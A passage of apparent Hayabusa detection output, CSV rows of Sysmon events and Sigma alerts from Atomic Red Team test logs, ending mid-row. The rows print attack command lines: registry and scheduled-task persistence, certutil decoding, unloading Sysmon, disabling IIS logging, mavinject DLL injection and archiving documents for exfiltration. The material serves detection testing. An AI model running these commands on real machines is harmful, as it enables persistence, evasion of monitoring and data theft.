747F3D96-D982-5D31-0000-0010DC633900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:54.976 +00:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation_sysmon/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:55.018 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:55.018 +00:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation_sysmon/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:01.925 +00:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:01.955 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 
747F3D96-D989-5D31-0000-0010FC7B3900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:16.782 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 747F3D96-D998-5D31-0000-001008B43900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:16.830 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:57.044 +00:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:58.819 +00:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: 
MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:02.378 +00:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:02.806 +00:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:02.895 +00:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:02.977 +00:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: 
MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.235 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.235 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.309 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.309 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.961 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 
747F3D96-DA3F-5D31-0000-0010562E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.961 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.974 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.974 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.210 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.270 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 
747F3D96-DA40-5D31-0000-00106A543C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.270 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.294 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.294 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.333 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.333 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil 
Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.361 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.361 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.412 +00:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.412 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: 
C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.412 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.600 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.643 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:14.715 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:14.758 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | 
Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:14.944 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:14.991 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:15.776 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:15.776 +00:00,MSEDGEWIN10,1,critical,,MavInject Process 
Injection,,rules/sigma/process_creation_sysmon/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:16.496 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:16.552 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:44.283 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.073 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 14:57:46.094 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.094 +00:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,rules/sigma/process_creation_sysmon/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.207 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.422 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.459 +00:00,MSEDGEWIN10,1,high,,Process 
Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.459 +00:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.608 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.640 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.828 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S 
localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.849 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe 